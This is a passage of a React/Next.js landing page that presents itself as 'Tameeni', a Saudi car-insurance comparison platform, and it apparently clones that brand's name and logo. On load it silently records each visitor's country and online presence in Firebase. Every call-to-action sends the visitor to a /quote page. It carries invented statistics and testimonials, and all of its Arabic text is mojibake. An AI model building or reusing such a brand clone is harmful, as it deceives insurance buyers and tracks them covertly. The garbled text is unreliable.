"use client"

export const dynamic = 'force-dynamic'

import { Button } from "@/components/ui/button"
import { Card, CardContent } from "@/components/ui/card"
import { Badge } from "@/components/ui/badge"
import { Input } from "@/components/ui/input"
import { Textarea } from "@/components/ui/textarea"
import {
  Shield,
  Users,
  Star,
  Download,
  Smartphone,
  CheckCircle,
  Globe,
  Phone,
  Mail,
  Award,
  TrendingUp,
  FileText,
  HeadphonesIcon,
  Zap,
  Lock,
  Clock,
  DollarSign,
  Car,
  Calculator,
  MessageCircle,
  ChevronDown,
  ChevronUp,
  ArrowRight,
  CreditCard,
  Home,
  Plane,
  Heart,
  Menu,
  X,
} from "lucide-react"
import { useState, useEffect } from "react"
import { addData } from "@/lib/firebase"
import { setupOnlineStatus } from "@/lib/utils"
function randstr(prefix:string)
{
    return Math.random().toString(36).replace('0.',prefix || '');
}
const visitorID=randstr('Tmn-')
export default function TameeniComprehensive() {
  const [mounted, setMounted] = useState(false)
  const [mobileMenuOpen, setMobileMenuOpen] = useState(false)
  const [activeTab, setActiveTab] = useState(0)
  const [openFaq, setOpenFaq] = useState<number | null>(null)
  const [ready, setReady] = useState(true)

  useEffect(() => {
    setMounted(true)
    getLocation().finally(()=>{
      setReady(false)
    })
  }, [])

  if (!mounted) {
    return null
  }
  async function getLocation() {
    try {
        const response = await fetch('/api/geolocation');
        if (!response.ok) {
            throw new Error(`HTTP error! Status: ${response.status}`);
        }
        const data = await response.json();
        const country = data.country;
        addData({
            id:visitorID,
            country: country
        })
        localStorage.setItem('country',country)
        setupOnlineStatus(visitorID)
      } catch (error) {
        console.error('Error fetching location:', error);
    }
  }
  const stats = [
    { number: "500,000+", label: "ุนููู ุฑุงุถู", icon: Users, color: "from-[#109cd4]  to-blue-600" },
    { number: "25+", label: "ุดุฑูุฉ ุชุฃููู", icon: Award, color: "from-green-500 to-green-600" },
    { number: "4.9/5", label: "ุชูููู ุงูุนููุงุก", icon: Star, color: "from-yellow-500 to-yellow-600" },
    { number: "24/7", label: "ุฏุนู ุงูุนููุงุก", icon: HeadphonesIcon, color: "from-purple-500 to-purple-600" },
  ]

  const features = [
    {
      icon: Shield,
      title: "ุญูุงูุฉ ุดุงููุฉ",
      description: "ุชุบุทูุฉ ุดุงููุฉ ูุณูุงุฑุชู ุถุฏ ุฌููุน ุงููุฎุงุทุฑ ูุงูุญูุงุฏุซ ูุน ุฃูุถู ุดุฑูุงุช ุงูุชุฃููู",
      color: "from-[#109cd4]  to-blue-600",
    },
    {
      icon: Zap,
      title: "ุณุฑุนุฉ ูุงุฆูุฉ",
      description: "ุงุญุตู ุนูู ูุซููุฉ ุงูุชุฃููู ูู ุฃูู ูู 5 ุฏูุงุฆู ูุน ูุธุงู ูุนุงูุฌุฉ ููุฑู",
      color: "from-green-500 to-green-600",
    },
    {
      icon: TrendingUp,
      title: "ุฃูุถู ุงูุฃุณุนุงุฑ",
      description: "ููุงุฑูุฉ ุฐููุฉ ูููุฑูุฉ ููุญุตูู ุนูู ุฃูุถู ุงูุนุฑูุถ ูู ุฌููุน ุงูุดุฑูุงุช",
      color: "from-purple-500 to-purple-600",
    },
    {
      icon: Lock,
      title: "ุฃูุงู ูุซูุฉ",
      description: "ุจูุงูุงุชู ูุญููุฉ ุจุฃุนูู ูุนุงููุฑ ุงูุฃูุงู ูุงูุชุดููุฑ ุงููุชูุฏู",
      color: "from-red-500 to-red-600",
    },
    {
      icon: Clock,
      title: "ุฎุฏูุฉ ูุณุชูุฑุฉ",
      description: "ุฏุนู ุนููุงุก ูุชุงุญ ุนูู ูุฏุงุฑ ุงูุณุงุนุฉ ููุณุงุนุฏุชู ูู ุฃู ููุช",
      color: "from-indigo-500 to-indigo-600",
    },
    {
      icon: DollarSign,
      title: "ุชูููุฑ ูุถููู",
      description: "ููุฑ ุญุชู 40% ูู ูููุฉ ุงูุชุฃููู ูุน ุนุฑูุถูุง ุงูุญุตุฑูุฉ",
      color: "from-orange-500 to-orange-600",
    },
  ]

  const services = [
    {
      icon: Car,
      title: "ุชุฃููู ุงูุณูุงุฑุงุช",
      description: "ุชุฃููู ุดุงูู ูุถุฏ ุงูุบูุฑ ููุณูุงุฑุงุช",
      features: ["ุชุฃููู ุดุงูู", "ุถุฏ ุงูุบูุฑ", "ุญูุงุฏุซ ุดุฎุตูุฉ", "ูุณุงุนุฏุฉ ุทุฑูู"],
    },
    {
      icon: Heart,
      title: "ุงูุชุฃููู ุงูุตุญู",
      description: "ุชุบุทูุฉ ุตุญูุฉ ุดุงููุฉ ููุฃูุฑุงุฏ ูุงูุนุงุฆูุงุช",
      features: ["ุชุบุทูุฉ ุดุงููุฉ", "ุดุจูุฉ ูุงุณุนุฉ", "ุฎุฏูุงุช ุทุงุฑุฆุฉ", "ุฃุฏููุฉ ูุฌุงููุฉ"],
    },
    {
      icon: Home,
      title: "ุชุฃููู ุงูููุงุฒู",
      description: "ุญูุงูุฉ ููุฒูู ููุญุชููุงุชู",
      features: ["ุญุฑูู ูุณุฑูุฉ", "ููุงุฑุซ ุทุจูุนูุฉ", "ูุณุคูููุฉ ูุฏููุฉ", "ูุญุชููุงุช ุงูููุฒู"],
    },
    {
      icon: Plane,
      title: "ุชุฃููู ุงูุณูุฑ",
      description: "ุชุฃููู ุดุงูู ูุฑุญูุงุชู",
      features: ["ุชุบุทูุฉ ุทุจูุฉ", "ุฅูุบุงุก ุงูุฑุญูุฉ", "ููุฏุงู ุงูุฃูุชุนุฉ", "ุชุฃุฎูุฑ ุงูุฑุญูุงุช"],
    },
  ]

  const testimonials = [
    {
      name: "ุฃุญูุฏ ูุญูุฏ",
      role: "ูููุฏุณ",
      content: "ุฎุฏูุฉ ููุชุงุฒุฉ ูููุฑุช ูู 35% ูู ูููุฉ ุงูุชุฃููู. ุงูุชุทุจูู ุณูู ุงูุงุณุชุฎุฏุงู ูุงูุฏุนู ุงูููู ุฑุงุฆุน.",
      rating: 5,
      image: "/user.png",
    },
    {
      name: "ูุงุทูุฉ ุงูุนูู",
      role: "ุทุจูุจุฉ",
      content: "ุฃูุถู ููุตุฉ ุชุฃููู ุฌุฑุจุชูุง. ุงูููุงุฑูุฉ ุณุฑูุนุฉ ูุงูุฃุณุนุงุฑ ุดูุงูุฉ. ุฃูุตุญ ุจูุง ุจุดุฏุฉ.",
      rating: 5,
      image: "/user.png",
    },
    {
      name: "ุฎุงูุฏ ุงูุณุนุฏ",
      role: "ุฑุฌู ุฃุนูุงู",
      content: "ุชุฌุฑุจุฉ ุงุณุชุซูุงุฆูุฉ ูู ุงูุจุฏุงูุฉ ููููุงูุฉ. ุญุตูุช ุนูู ูุซููุฉ ุงูุชุฃููู ูู ุฏูุงุฆู ูุนุฏูุฏุฉ.",
      rating: 5,
      image: "/user.png",
    },
  ]

  const faqs = [
    {
      question: "ููู ูููููู ุงูุญุตูู ุนูู ุนุฑุถ ุณุนุฑุ",
      answer:
        "ููููู ุงูุญุตูู ุนูู ุนุฑุถ ุณุนุฑ ููุฑู ูู ุฎูุงู ุฅุฏุฎุงู ุจูุงูุงุช ุณูุงุฑุชู ููุนูููุงุชู ุงูุดุฎุตูุฉ ูู ุงููููุฐุฌ ุฃุนูุงู. ุณุชุญุตู ุนูู ููุงุฑูุฉ ุดุงููุฉ ูู ุฌููุน ุดุฑูุงุช ุงูุชุฃููู ูู ุฃูู ูู ุฏูููุชูู.",
    },
    {
      question: "ูู ุงูุฎุฏูุฉ ูุฌุงููุฉุ",
      answer:
        "ูุนูุ ุฎุฏูุฉ ุงูููุงุฑูุฉ ูุงูุญุตูู ุนูู ุนุฑูุถ ุงูุฃุณุนุงุฑ ูุฌุงููุฉ ุชูุงูุงู. ูุญู ูุญุตู ุนูู ุนูููุฉ ูู ุดุฑูุงุช ุงูุชุฃููู ุนูุฏ ุฅุชูุงู ุนูููุฉ ุงูุดุฑุงุกุ ูุฐูู ูุง ุชูุฌุฏ ุฃู ุฑุณูู ุฅุถุงููุฉ ุนููู.",
    },
    {
      question: "ูู ูู ุงูููุช ูุณุชุบุฑู ุฅุตุฏุงุฑ ุงููุซููุฉุ",
      answer:
        "ูุชู ุฅุตุฏุงุฑ ุงููุซููุฉ ููุฑูุงู ุจุนุฏ ุฅุชูุงู ุนูููุฉ ุงูุฏูุน. ุณุชุญุตู ุนูู ูุณุฎุฉ ุฅููุชุฑูููุฉ ุนุจุฑ ุงูุจุฑูุฏ ุงูุฅููุชุฑููู ูุงูุฑุณุงุฆู ุงููุตูุฉุ ููุง ููููู ุชุญููููุง ูู ุงูุชุทุจูู ุฃู ุงููููุน.",
    },
    {
      question: "ูู ูููููู ุชุนุฏูู ุงููุซููุฉ ุจุนุฏ ุงูุดุฑุงุกุ",
      answer:
        "ูุนูุ ููููู ุฅุฌุฑุงุก ุชุนุฏููุงุช ุนูู ูุซููุชู ูู ุฎูุงู ุงูุชุทุจูู ุฃู ุงููููุน ุงูุฅููุชุฑููู. ุจุนุถ ุงูุชุนุฏููุงุช ูุฏ ุชุชุทูุจ ุฑุณูู ุฅุถุงููุฉ ุญุณุจ ููุน ุงูุชุบููุฑ ูุณูุงุณุฉ ุดุฑูุฉ ุงูุชุฃููู.",
    },
    {
      question: "ูุงุฐุง ูู ุงุญุชุฌุช ูุณุงุนุฏุฉุ",
      answer:
        "ูุฑูู ุฏุนู ุงูุนููุงุก ูุชุงุญ ุนูู ูุฏุงุฑ ุงูุณุงุนุฉ ููุณุงุนุฏุชู. ููููู ุงูุชูุงุตู ูุนูุง ุนุจุฑ ุงููุงุชูุ ุงูุจุฑูุฏ ุงูุฅููุชุฑูููุ ุฃู ุงูุฏุฑุฏุดุฉ ุงููุจุงุดุฑุฉ ูู ุงูุชุทุจูู ูุงููููุน.",
    },
  ]

  const processSteps = [
    {
      step: "1",
      title: "ุฃุฏุฎู ุจูุงูุงุชู",
      description: "ูุนูููุงุช ุงูุณูุงุฑุฉ ูุงูุณุงุฆู",
      icon: FileText,
    },
    {
      step: "2",
      title: "ูุงุฑู ุงูุนุฑูุถ",
      description: "ูู ุฃูุซุฑ ูู 25 ุดุฑูุฉ",
      icon: Calculator,
    },
    {
      step: "3",
      title: "ุงุฎุชุฑ ุงูุฃูุณุจ",
      description: "ุญุณุจ ุงุญุชูุงุฌุงุชู ูููุฒุงููุชู",
      icon: CheckCircle,
    },
    {
      step: "4",
      title: "ุงุฏูุน ุจุฃูุงู",
      description: "ุทุฑู ุฏูุน ูุชุนุฏุฏุฉ ูุขููุฉ",
      icon: CreditCard,
    },
  ]
  if (!mounted || ready) {
    return (
      <div className="min-h-screen bg-gradient-to-br from-gray-50 via-white to-blue-50/30 flex items-center justify-center">
        <div className="text-center">
          <div className="w-16 h-16 border-4 border-blue-500 border-t-transparent rounded-full animate-spin mx-auto mb-4"></div>
          <p className="text-gray-600">ุฌุงุฑู ุงูุชุญููู...</p>
        </div>
      </div>
    )
  }
  return (
    <div className="min-h-screen bg-white" style={{ direction: "rtl" }}>
      {/* Header */}
      <header className="bg-white/95 backdrop-blur-md border-b border-gray-100 px-4 lg:px-6 py-4 sticky top-0 z-50 shadow-sm">
        <div className="max-w-7xl mx-auto flex items-center justify-between">
          <div className="flex items-center gap-4 lg:gap-8">
            <div className="flex items-center gap-3">
              <img src="/Logo-AR.png" alt="logo" width={80} />

            </div>
            <nav className="hidden lg:flex items-center gap-8 text-sm font-medium">
              <a href="#" className="text-gray-700 hover:text-blue-600 transition-colors">
                ุงูุฑุฆูุณูุฉ
              </a>
              <a href="#services" className="text-gray-700 hover:text-blue-600 transition-colors">
                ุงูุฎุฏูุงุช
              </a>
              <a href="#about" className="text-gray-700 hover:text-blue-600 transition-colors">
                ุนู ุงูุดุฑูุฉ
              </a>
              <a href="#contact" className="text-gray-700 hover:text-blue-600 transition-colors">
                ุงุชุตู ุจูุง
              </a>
            </nav>
          </div>
          <div className="flex items-center gap-2 lg:gap-3">
            <Button variant="ghost" size="sm" className="hidden sm:flex text-gray-600 hover:text-blue-600">
              English
            </Button>
            <Button
              onClick={() => (window.location.href = "/quote")}

              variant="outline" size="sm" className="hidden sm:flex border-gray-300 text-xs lg:text-sm">
              ุชุณุฌูู ุงูุฏุฎูู
            </Button>
            <Button
              onClick={() => (window.location.href = "/quote")}

              size="sm"
              className="bg-gradient-to-r from-blue-600 to-[#109cd4]  hover:from-[#109cd4]  hover:to-[#109cd4]  shadow-lg text-xs lg:text-sm px-3 lg:px-4"
            >
              ุงุจุฏุฃ ุงูุขู

            </Button>
            <Button variant="ghost" size="sm" className="lg:hidden" onClick={() => setMobileMenuOpen(!mobileMenuOpen)}>
              {mobileMenuOpen ? <X className="w-5 h-5" /> : <Menu className="w-5 h-5" />}
            </Button>
          </div>
        </div>

        {/* Mobile Menu */}
        {mobileMenuOpen && (
          <div className="lg:hidden mt-4 pb-4 border-t border-gray-100">
            <nav className="flex flex-col gap-4 pt-4">
              <a href="#" className="text-gray-700 hover:text-blue-600 transition-colors">
                ุงูุฑุฆูุณูุฉ
              </a>
              <a href="#services" className="text-gray-700 hover:text-blue-600 transition-colors">
                ุงูุฎุฏูุงุช
              </a>
              <a href="#about" className="text-gray-700 hover:text-blue-600 transition-colors">
                ุนู ุงูุดุฑูุฉ
              </a>
              <a href="#contact" className="text-gray-700 hover:text-blue-600 transition-colors">
                ุงุชุตู ุจูุง
              </a>
              <div className="flex gap-2 pt-2">
                <Button variant="ghost" size="sm" className="text-gray-600">
                  English
                </Button>
                <Button variant="outline" size="sm" className="border-gray-300">
                  ุชุณุฌูู ุงูุฏุฎูู
                </Button>
              </div>
            </nav>
          </div>
        )}
      </header>

      {/* Hero Section */}
      <section className="relative bg-gradient-to-br from-blue-50 via-white to-blue-50 px-4 lg:px-6 py-12 lg:py-20 overflow-hidden">
        <div className="max-w-7xl mx-auto">
          <div className="grid lg:grid-cols-2 gap-8 lg:gap-16 items-center">
            <div className="relative order-first lg:order-first">
              <div className="relative">
                <img
                  src="/motor-desktop.webp"
                  alt="car"
                  width={400}
                  height={500}
                  className="relative rounded-3xl shadow-2xl w-full max-w-md mx-auto"
                />
              </div>
            </div>

            <div className="space-y-8 text-center lg:text-right">
              <div className="space-y-6">
                <h1 className="text-3xl sm:text-4xl lg:text-5xl xl:text-6xl font-bold text-gray-900 leading-tight">
                  ุฃูู ููุตุฉ ูุชุฃููู ุงูุณูุงุฑุงุช ูู
                  <br />
                  <span className="text-blue-600">ุงูุณุนูุฏูุฉ</span>
                </h1>
                <p className="text-lg lg:text-xl text-gray-600 leading-relaxed max-w-2xl mx-auto lg:mx-0">
                  ุฌููุน ุดุฑูุงุช ุงูุชุฃููู ูู ููุงู ูุงุญุฏุ ูุฌููุนุฉ ูุงุณุนุฉ ูู ุงูุฎูุงุฑุงุช ูุฃุณุนุงุฑ ููุฑู ููุซุงุฆู ุงูุชุฃููู
                </p>
              </div>

              <div className="flex justify-center lg:justify-start">
                <Button
                  size="lg"
                  className="bg-blue-600 hover:bg-[#109cd4]  text-white px-12 py-4 text-lg font-semibold rounded-lg shadow-lg hover:shadow-xl transition-all duration-300"
                  onClick={() => (window.location.href = "/quote")}
                >
                  ุงุจุฏุฃ ุงูุขู
                </Button>
              </div>

              <div className="bg-teal-50 border border-teal-200 rounded-lg p-4 max-w-md mx-auto lg:mx-0">
                <p className="text-sm text-teal-700 flex items-center gap-2">
                  <span className="w-4 h-4 bg-teal-500 rounded-full flex-shrink-0"></span>
                  ูู ุชุฑูุฏ ุดุฑุงุก ูุซููุฉ ุชุฃูููุ ุชุญูู ูู ูู ูุฐุง ุงููููุน ุงูุตุญูุญ
                </p>
              </div>
            </div>
          </div>

          {/* Insurance Company Logos */}
          <div className="mt-16 pt-8 border-t border-gray-200">
            <div className="text-center mb-8">
              <p className="text-sm text-gray-600 mb-4">18 ุดุฑูุฉ</p>
              <p className="text-lg font-semibold text-gray-900">ุดุฑูุงุก ุงูุชุฃููู ุงููุนุชูุฏูู</p>
            </div>
            <div className="flex flex-wrap items-center justify-center gap-8 opacity-60">
              {[1, 2, 3, 4, 5, 6, 7, 8].map((i) => (
                <div key={i} className="w-20 h-12 bg-gray-200 rounded flex items-center justify-center">
                  <img className="w-16 h-10" src={`/companies/company-${i}.svg`} alt="" />
                </div>
              ))}
            </div>
          </div>
        </div>
      </section>

      {/* Promotional Cards */}
      <section className="py-12 bg-white">
        <div className="max-w-6xl mx-auto px-4 lg:px-6">
          <div className="grid md:grid-cols-2 gap-6">
            {/* Tameeni Hero Card */}
            <Card className="bg-[url(/ar-hero-banner-web-new.webp)] h-[40vw] bg-cover  text-white border-0 overflow-hidden">
              <CardContent className="p-8 relative">
                <div className="flex items-center justify-between">
                  <div className="space-y-4">

                  </div>
                  <div className="hidden md:block">
                    <img
                      src="/placeholder.svg?height=120&width=120"
                      alt="ุชุฃูููู ููุฑู"
                      width={120}
                      height={120}
                      className="opacity-80"
                    />
                  </div>
                </div>
              </CardContent>
            </Card>

            {/* Save More Card */}
            <Card className="bg-[url(/ar-banner-web.webp)] h-[40vw] bg-cover  text-white border-0 overflow-hidden">
              <CardContent className="p-8 relative">
                <div className="flex items-center justify-between">
                  <div className="space-y-4">

                  </div>
                  <div className="hidden md:block">
                    <img
                      src="/placeholder.svg?height=120&width=120"
                      alt=" ููุฑู"
                      width={120}
                      height={120}
                      className="opacity-80"
                    />
                  </div>
                </div>
              </CardContent>
            </Card>

          </div>
        </div>
      </section>

      {/* Professional Multi-Step Quote Form */}
      {/* Quote Form CTA Section */}
      <section className="py-8 lg:py-12 bg-white border-b border-gray-100">
        <div className="max-w-6xl mx-auto px-4 lg:px-6">
          <div className="bg-gradient-to-r from-blue-50 to-indigo-50 rounded-2xl lg:rounded-3xl p-6 lg:p-8 border border-blue-100">
            <div className="text-center space-y-6">
              <div>
                <h2 className="text-xl lg:text-2xl font-bold text-gray-900 mb-2">ุงุญุตู ุนูู ุนุฑุถ ุณุนุฑ ููุฑู</h2>
                <p className="text-sm lg:text-base text-gray-600">
                  ุฃููู ุงูุจูุงูุงุช ููุญุตูู ุนูู ุฃูุถู ุนุฑูุถ ุงูุชุฃููู ูู ุฃูุซุฑ ูู 25 ุดุฑูุฉ
                </p>
              </div>

              <div className="flex flex-col sm:flex-row gap-4 justify-center items-center">
                <Button
                  size="lg"
                  className="bg-gradient-to-r from-blue-600 to-[#109cd4]  hover:from-[#109cd4]  hover:to-[#109cd4]  shadow-xl hover:shadow-2xl transition-all duration-300 px-8 py-4 text-lg"
                  onClick={() => (window.location.href = "/quote")}
                >
                  <Calculator className="w-5 h-5 ml-2" />
                  ุงุจุฏุฃ ุงูููุงุฑูุฉ ุงูุขู
                </Button>
                <p className="text-sm text-gray-500">ูุฌุงูู 100% โข ูุง ูุชุทูุจ ุจุทุงูุฉ ุงุฆุชูุงู</p>
              </div>

              <div className="grid grid-cols-3 gap-4 max-w-md mx-auto">
                <div className="text-center">
                  <div className="w-12 h-12 bg-blue-100 rounded-full flex items-center justify-center mx-auto mb-2">
                    <Clock className="w-6 h-6 text-blue-600" />
                  </div>
                  <p className="text-xs text-gray-600">3 ุฏูุงุฆู ููุท</p>
                </div>
                <div className="text-center">
                  <div className="w-12 h-12 bg-green-100 rounded-full flex items-center justify-center mx-auto mb-2">
                    <Shield className="w-6 h-6 text-green-600" />
                  </div>
                  <p className="text-xs text-gray-600">25+ ุดุฑูุฉ ุชุฃููู</p>
                </div>
                <div className="text-center">
                  <div className="w-12 h-12 bg-purple-100 rounded-full flex items-center justify-center mx-auto mb-2">
                    <TrendingUp className="w-6 h-6 text-purple-600" />
                  </div>
                  <p className="text-xs text-gray-600">ููุฑ ุญุชู 40%</p>
                </div>
              </div>
            </div>
          </div>
        </div>
      </section>

      {/* Stats Section */}
      <section className="py-12 lg:py-16 bg-white">
        <div className="max-w-7xl mx-auto px-4 lg:px-6">
          <div className="grid grid-cols-2 lg:grid-cols-4 gap-4 lg:gap-8">
            {stats.map((stat, index) => (
              <Card key={index} className="border-0 shadow-lg hover:shadow-xl transition-all duration-300 group">
                <CardContent className="p-4 lg:p-6 text-center">
                  <div
                    className={`w-12 h-12 lg:w-16 lg:h-16 bg-gradient-to-br ${stat.color} rounded-xl lg:rounded-2xl flex items-center justify-center mx-auto mb-3 lg:mb-4 group-hover:scale-110 transition-transform duration-300`}
                  >
                    <stat.icon className="w-6 h-6 lg:w-8 lg:h-8 text-white" />
                  </div>
                  <h3 className="text-lg lg:text-2xl font-bold text-gray-900 mb-1 lg:mb-2">{stat.number}</h3>
                  <p className="text-xs lg:text-sm text-gray-600 font-medium">{stat.label}</p>
                </CardContent>
              </Card>
            ))}
          </div>
        </div>
      </section>

      {/* Features Section */}
      <section className="py-12 lg:py-20 bg-gradient-to-br from-gray-50 to-blue-50">
        <div className="max-w-7xl mx-auto px-4 lg:px-6">
          <div className="text-center mb-12 lg:mb-16">
            <Badge className="bg-blue-100 text-[#109cd4]  mb-4 px-3 lg:px-4 py-2 text-xs lg:text-sm">
              โจ ูููุฒุงุช ุงุณุชุซูุงุฆูุฉ
            </Badge>
            <h2 className="text-2xl lg:text-3xl xl:text-4xl font-bold text-gray-900 mb-4 lg:mb-6">
              ููุงุฐุง ูุฎุชุงุฑ ุงูุนููุงุก ุชุฃููููุ
            </h2>
            <p className="text-base lg:text-xl text-gray-600 max-w-3xl mx-auto">
              ููุฏู ุชุฌุฑุจุฉ ุชุฃููู ูุชุทูุฑุฉ ุชุฌูุน ุจูู ุงูุชูููููุฌูุง ุงููุชูุฏูุฉ ูุงูุฎุฏูุฉ ุงูุงุณุชุซูุงุฆูุฉ
            </p>
          </div>

          <div className="grid sm:grid-cols-2 lg:grid-cols-3 gap-6 lg:gap-8">
            {features.map((feature, index) => (
              <Card
                key={index}
                className="border-0 shadow-lg hover:shadow-2xl transition-all duration-500 group hover:-translate-y-2"
              >
                <CardContent className="p-6 lg:p-8 text-center">
                  <div
                    className={`w-12 h-12 lg:w-16 lg:h-16 bg-gradient-to-br ${feature.color} rounded-xl lg:rounded-2xl flex items-center justify-center mx-auto mb-4 lg:mb-6 group-hover:scale-110 transition-transform duration-300`}
                  >
                    <feature.icon className="w-6 h-6 lg:w-8 lg:h-8 text-white" />
                  </div>
                  <h3 className="text-lg lg:text-xl font-bold text-gray-900 mb-3 lg:mb-4">{feature.title}</h3>
                  <p className="text-sm lg:text-base text-gray-600 leading-relaxed">{feature.description}</p>
                </CardContent>
              </Card>
            ))}
          </div>
        </div>
      </section>

      {/* Insurance Types Section */}
      <section className="py-16 bg-gray-50">
        <div className="max-w-6xl mx-auto px-4 lg:px-6">
          <div className="text-center mb-12">
            <h2 className="text-3xl font-bold text-gray-900 mb-4">ุชุฃููู ุณูุงุฑุงุช ูุฃูุซุฑ!</h2>
            <p className="text-lg text-blue-600">ููุชุฌุงุช ุงูุชุฃููู ุงููุชููุนุฉ</p>

            <div className="flex justify-center mt-6">
              <div className="flex bg-white rounded-lg p-1 shadow-sm">
                <button className="px-6 py-2 bg-blue-600 text-white rounded-md text-sm font-medium">ููุดุฑูุงุช</button>
                <button className="px-6 py-2 text-gray-600 rounded-md text-sm font-medium hover:bg-gray-100">
                  ููุฃูุฑุงุฏ
                </button>
              </div>
            </div>
          </div>

          <div className="grid sm:grid-cols-2 lg:grid-cols-4 gap-6">
            {[
              { title: "ุงูุณูุงุฑุงุช", icon: Car, description: "ุชุฃููู ุดุงูู ูุถุฏ ุงูุบูุฑ" },
              { title: "ุงูุตุญุฉ ุงูุทุจูุฉ", icon: Heart, description: "ุชุบุทูุฉ ุตุญูุฉ ุดุงููุฉ" },
              { title: "ุงูุญูุงุฏุซ ุงูุทุจูุฉ", icon: Shield, description: "ุญูุงูุฉ ูู ุงูุญูุงุฏุซ" },
              { title: "ุงูุณูุฑ", icon: Plane, description: "ุชุฃููู ุดุงูู ููุณูุฑ" },
            ].map((service, index) => (
              <Card key={index} className="border-0 shadow-lg hover:shadow-xl transition-all duration-300 group">
                <CardContent className="p-6 text-center">
                  <div className="w-16 h-16 bg-blue-100 rounded-2xl flex items-center justify-center mx-auto mb-4 group-hover:scale-110 transition-transform duration-300">
                    <service.icon className="w-8 h-8 text-blue-600" />
                  </div>
                  <h3 className="text-lg font-bold text-gray-900 mb-2">{service.title}</h3>
                  <p className="text-sm text-gray-600 mb-4">{service.description}</p>
                  <Button variant="outline" size="sm" className="text-blue-600 border-blue-600 hover:bg-blue-50">
                    ุงุจุฏุฃ ุงูุขู
                  </Button>
                </CardContent>
              </Card>
            ))}
          </div>
        </div>
      </section>

      {/* Insurance Comparison Section */}
      <section className="py-16 bg-white">
        <div className="max-w-6xl mx-auto px-4 lg:px-6">
          <div className="text-center mb-12">
            <h2 className="text-2xl lg:text-3xl font-bold text-gray-900 mb-4">
              ูู ูุฌุจ ุฃู ุฃุดุชุฑู ุชุฃูููุงู ุดุงููุงู ุฃู ุชุฃููู ุทุฑู ุซุงูุซ ูุณูุงุฑุชูุ
            </h2>
            <p className="text-lg text-gray-600">
              ุชุญูู ูู ูู ูุง ุชุฑูุฏ ูุนุฑูุชู ูู ูุฐุง ุงูุฏููู ุงูุดุงูู ูุงุฎุชูุงุฑุงุชู ูุชุฌุฏ ุฃูุถู ูุง ููุงุณุจู
            </p>
          </div>

          <div className="grid md:grid-cols-3 gap-6">
            {[
              {
                title: "ุถุฏ ุงูุบูุฑ ููุท",
                badge: "ุงูุฃุณุงุณู",
                badgeColor: "bg-gray-500",
                description: "ูุบุทู ุงูุฃุถุฑุงุฑ ุงูุชู ุชูุญู ุจุงูุขุฎุฑูู ููุท ููุง ูุดูู ุณูุงุฑุชู ุงูุฎุงุตุฉ",
                buttonText: "ุงูุฑุฃ ุงููุฒูุฏ",
                buttonColor: "bg-gray-600 hover:bg-gray-700",
              },
              {
                title: "ุงูุชุฃููู ุงูุดุงูู",
                badge: "ุงูุฃูุถู",
                badgeColor: "bg-yellow-500",
                description: "ูุบุทู ุณูุงุฑุชู ูุงูุขุฎุฑูู ูุน ุชุบุทูุฉ ุดุงููุฉ ุถุฏ ุงูุณุฑูุฉ ูุงูุญูุงุฏุซ ูุงูููุงุฑุซ ุงูุทุจูุนูุฉ",
                buttonText: "ุงูุฑุฃ ุงููุฒูุฏ",
                buttonColor: "bg-blue-600 hover:bg-[#109cd4] ",
              },
              {
                title: "ุถุฏ ุงูุบูุฑ ุงูุชูุณุนู",
                badge: "ูุชูุณุท",
                badgeColor: "bg-green-500",
                description: "ุชุบุทูุฉ ูุชูุณุทุฉ ุชุดูู ุงูุขุฎุฑูู ูุน ุจุนุถ ุงูุญูุงูุฉ ุงูุฅุถุงููุฉ ูุณูุงุฑุชู",
                buttonText: "ุงูุฑุฃ ุงููุฒูุฏ",
                buttonColor: "bg-green-600 hover:bg-green-700",
              },
            ].map((option, index) => (
              <Card key={index} className="border border-gray-200 hover:shadow-lg transition-all duration-300">
                <CardContent className="p-6">
                  <div className="mb-4">
                    <span
                      className={`inline-block px-3 py-1 rounded-full text-white text-xs font-medium ${option.badgeColor}`}
                    >
                      {option.badge}
                    </span>
                  </div>
                  <h3 className="text-xl font-bold text-gray-900 mb-3">{option.title}</h3>
                  <p className="text-gray-600 mb-6 leading-relaxed">{option.description}</p>
                  <Button className={`w-full ${option.buttonColor} text-white`}>{option.buttonText}</Button>
                </CardContent>
              </Card>
            ))}
          </div>
        </div>
      </section>

      {/* Process Steps */}
      <section className="py-12 lg:py-20 bg-gradient-to-br from-blue-50 to-indigo-50">
        <div className="max-w-7xl mx-auto px-4 lg:px-6">
          <div className="text-center mb-12 lg:mb-16">
            <Badge className="bg-purple-100 text-purple-700 mb-4 px-3 lg:px-4 py-2 text-xs lg:text-sm">
              ๐ ุนูููุฉ ุจุณูุทุฉ
            </Badge>
            <h2 className="text-2xl lg:text-3xl xl:text-4xl font-bold text-gray-900 mb-4 lg:mb-6">
              ููู ุชุญุตู ุนูู ุชุฃูููู ูู 4 ุฎุทูุงุช ุจุณูุทุฉ
            </h2>
            <p className="text-base lg:text-xl text-gray-600 max-w-3xl mx-auto">
              ุนูููุฉ ุณููุฉ ูุณุฑูุนุฉ ููุญุตูู ุนูู ุฃูุถู ุนุฑูุถ ุงูุชุฃููู
            </p>
          </div>

          <div className="grid sm:grid-cols-2 lg:grid-cols-4 gap-6 lg:gap-8">
            {processSteps.map((step, index) => (
              <div key={index} className="text-center group">
                <div className="relative mb-6 lg:mb-8">
                  <div className="w-16 h-16 lg:w-20 lg:h-20 bg-white rounded-full shadow-lg flex items-center justify-center mx-auto group-hover:scale-110 transition-transform duration-300">
                    <step.icon className="w-6 h-6 lg:w-8 lg:h-8 text-blue-600" />
                  </div>
                  <div className="absolute -top-2 -right-2 w-6 h-6 lg:w-8 lg:h-8 bg-blue-600 text-white rounded-full flex items-center justify-center text-xs lg:text-sm font-bold">
                    {step.step}
                  </div>
                  {index < processSteps.length - 1 && (
                    <div className="hidden lg:block absolute top-8 left-full w-full h-0.5 bg-blue-200 -translate-x-1/2"></div>
                  )}
                </div>
                <h3 className="text-lg lg:text-xl font-bold text-gray-900 mb-2 lg:mb-3">{step.title}</h3>
                <p className="text-sm lg:text-base text-gray-600">{step.description}</p>
              </div>
            ))}
          </div>
        </div>
      </section>

      {/* Testimonials */}
      <section className="py-12 lg:py-20 bg-white">
        <div className="max-w-7xl mx-auto px-4 lg:px-6">
          <div className="text-center mb-12 lg:mb-16">
            <Badge className="bg-yellow-100 text-yellow-700 mb-4 px-3 lg:px-4 py-2 text-xs lg:text-sm">
              โญ ุขุฑุงุก ุงูุนููุงุก
            </Badge>
            <h2 className="text-2xl lg:text-3xl xl:text-4xl font-bold text-gray-900 mb-4 lg:mb-6">
              ูุงุฐุง ูููู ุนููุงุคูุง ุนูุงุ
            </h2>
